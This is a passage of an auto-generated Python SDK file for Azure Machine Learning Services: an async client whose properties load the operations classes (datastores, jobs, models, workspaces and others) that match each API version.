from ..dataset_dataplane.aio.operations import DataContainerOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'data_container'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def data_containers(self):
"""Instance depends on the API version:
* 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>`
* 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>`
"""
api_version = self._get_api_version('data_containers')
if api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import DataContainersOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import DataContainersOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'data_containers'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def data_version(self):
"""Instance depends on the API version:
* 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>`
"""
api_version = self._get_api_version('data_version')
if api_version == '1.5.0':
from ..dataset_dataplane.aio.operations import DataVersionOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'data_version'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def data_versions(self):
"""Instance depends on the API version:
* 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>`
* 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>`
"""
api_version = self._get_api_version('data_versions')
if api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import DataVersionsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import DataVersionsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'data_versions'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def dataset_containers(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>`
"""
api_version = self._get_api_version('dataset_containers')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import DatasetContainersOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'dataset_containers'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def dataset_controller_v2(self):
"""Instance depends on the API version:
* 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>`
"""
api_version = self._get_api_version('dataset_controller_v2')
if api_version == '1.5.0':
from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'dataset_controller_v2'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def dataset_v2(self):
"""Instance depends on the API version:
* 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>`
"""
api_version = self._get_api_version('dataset_v2')
if api_version == '1.5.0':
from ..dataset_dataplane.aio.operations import DatasetV2Operations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'dataset_v2'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def dataset_versions(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>`
"""
api_version = self._get_api_version('dataset_versions')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import DatasetVersionsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'dataset_versions'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def datasets_v1(self):
"""Instance depends on the API version:
* 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>`
"""
api_version = self._get_api_version('datasets_v1')
if api_version == '1.5.0':
from ..dataset_dataplane.aio.operations import DatasetsV1Operations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'datasets_v1'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def datastores(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>`
* 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>`
* 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>`
"""
api_version = self._get_api_version('datastores')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import DatastoresOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import DatastoresOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import DatastoresOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'datastores'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def delete(self):
"""Instance depends on the API version:
* 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>`
* v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>`
"""
api_version = self._get_api_version('delete')
if api_version == '1.5.0':
from ..dataset_dataplane.aio.operations import DeleteOperations as OperationClass
elif api_version == 'v1.0':
from ..runhistory.aio.operations import DeleteOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'delete'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def environment_containers(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>`
* 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>`
* 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>`
* 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>`
"""
api_version = self._get_api_version('environment_containers')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import EnvironmentContainersOperations as OperationClass
elif api_version == '2021-10-01-dataplanepreview':
from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import EnvironmentContainersOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'environment_containers'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def environment_versions(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>`
* 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>`
* 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>`
* 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>`
"""
api_version = self._get_api_version('environment_versions')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations as OperationClass
elif api_version == '2021-10-01-dataplanepreview':
from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'environment_versions'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def events(self):
"""Instance depends on the API version:
* v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>`
"""
api_version = self._get_api_version('events')
if api_version == 'v1.0':
from ..runhistory.aio.operations import EventsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'events'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def experiments(self):
"""Instance depends on the API version:
* v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>`
"""
api_version = self._get_api_version('experiments')
if api_version == 'v1.0':
from ..runhistory.aio.operations import ExperimentsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'experiments'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def extensive_model(self):
"""Instance depends on the API version:
* 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>`
"""
api_version = self._get_api_version('extensive_model')
if api_version == '1.0.0':
from ..model_dataplane.aio.operations import ExtensiveModelOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'extensive_model'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def get_operation_status(self):
"""Instance depends on the API version:
* 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>`
"""
api_version = self._get_api_version('get_operation_status')
if api_version == '1.5.0':
from ..dataset_dataplane.aio.operations import GetOperationStatusOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'get_operation_status'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def jobs(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>`
* 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>`
* 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>`
"""
api_version = self._get_api_version('jobs')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import JobsOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import JobsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import JobsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'jobs'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def metric(self):
"""Instance depends on the API version:
* v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>`
"""
api_version = self._get_api_version('metric')
if api_version == 'v1.0':
from ..runhistory.aio.operations import MetricOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'metric'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def migration(self):
"""Instance depends on the API version:
* 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>`
"""
api_version = self._get_api_version('migration')
if api_version == '1.0.0':
from ..model_dataplane.aio.operations import MigrationOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'migration'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def model_containers(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>`
* 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>`
* 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>`
* 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>`
"""
api_version = self._get_api_version('model_containers')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import ModelContainersOperations as OperationClass
elif api_version == '2021-10-01-dataplanepreview':
from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import ModelContainersOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import ModelContainersOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'model_containers'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def model_versions(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>`
* 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>`
* 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>`
* 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>`
"""
api_version = self._get_api_version('model_versions')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import ModelVersionsOperations as OperationClass
elif api_version == '2021-10-01-dataplanepreview':
from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import ModelVersionsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'model_versions'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def models(self):
"""Instance depends on the API version:
* 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>`
"""
api_version = self._get_api_version('models')
if api_version == '1.0.0':
from ..model_dataplane.aio.operations import ModelsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'models'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def online_deployments(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>`
* 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>`
* 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>`
"""
api_version = self._get_api_version('online_deployments')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'online_deployments'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def online_endpoints(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>`
* 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>`
* 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>`
"""
api_version = self._get_api_version('online_endpoints')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import OnlineEndpointsOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import OnlineEndpointsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'online_endpoints'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def operations(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>`
* 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>`
* 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>`
"""
api_version = self._get_api_version('operations')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import Operations as OperationClass
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview.aio.operations import Operations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import Operations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'operations'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def private_endpoint_connections(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>`
* 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>`
* 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>`
"""
api_version = self._get_api_version('private_endpoint_connections')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'private_endpoint_connections'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def private_link_resources(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>`
* 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>`
* 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>`
"""
api_version = self._get_api_version('private_link_resources')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as OperationClass
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'private_link_resources'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def quotas(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>`
* 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>`
* 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>`
"""
api_version = self._get_api_version('quotas')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import QuotasOperations as OperationClass
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview.aio.operations import QuotasOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import QuotasOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'quotas'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def registry_management_non_workspace(self):
"""Instance depends on the API version:
* v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>`
"""
api_version = self._get_api_version('registry_management_non_workspace')
if api_version == 'v1.0':
from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'registry_management_non_workspace'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def run(self):
"""Instance depends on the API version:
* v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>`
"""
api_version = self._get_api_version('run')
if api_version == 'v1.0':
from ..runhistory.aio.operations import RunOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'run'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def run_artifacts(self):
"""Instance depends on the API version:
* v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>`
"""
api_version = self._get_api_version('run_artifacts')
if api_version == 'v1.0':
from ..runhistory.aio.operations import RunArtifactsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'run_artifacts'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def runs(self):
"""Instance depends on the API version:
* v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>`
"""
api_version = self._get_api_version('runs')
if api_version == 'v1.0':
from ..runhistory.aio.operations import RunsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'runs'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def spans(self):
"""Instance depends on the API version:
* v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>`
"""
api_version = self._get_api_version('spans')
if api_version == 'v1.0':
from ..runhistory.aio.operations import SpansOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'spans'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def temporary_data_references(self):
"""Instance depends on the API version:
* 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>`
"""
api_version = self._get_api_version('temporary_data_references')
if api_version == '2021-10-01-dataplanepreview':
from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'temporary_data_references'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def usages(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>`
* 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>`
* 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>`
"""
api_version = self._get_api_version('usages')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import UsagesOperations as OperationClass
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview.aio.operations import UsagesOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import UsagesOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'usages'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def virtual_machine_sizes(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>`
* 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>`
* 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>`
"""
api_version = self._get_api_version('virtual_machine_sizes')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations as OperationClass
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'virtual_machine_sizes'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def workspace_connections(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>`
* 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>`
* 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>`
"""
api_version = self._get_api_version('workspace_connections')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as OperationClass
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'workspace_connections'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def workspace_features(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>`
* 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>`
* 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>`
"""
api_version = self._get_api_version('workspace_features')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as OperationClass
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'workspace_features'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def workspaces(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>`
* 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>`
* 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>`
"""
api_version = self._get_api_version('workspaces')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import WorkspacesOperations as OperationClass
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview.aio.operations import WorkspacesOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import WorkspacesOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'workspaces'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
async def close(self):
await self._client.close()
async def __aenter__(self):
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details):
await self._client.__aexit__(*exc_details)
| [
"azure.profiles.ProfileDefinition",
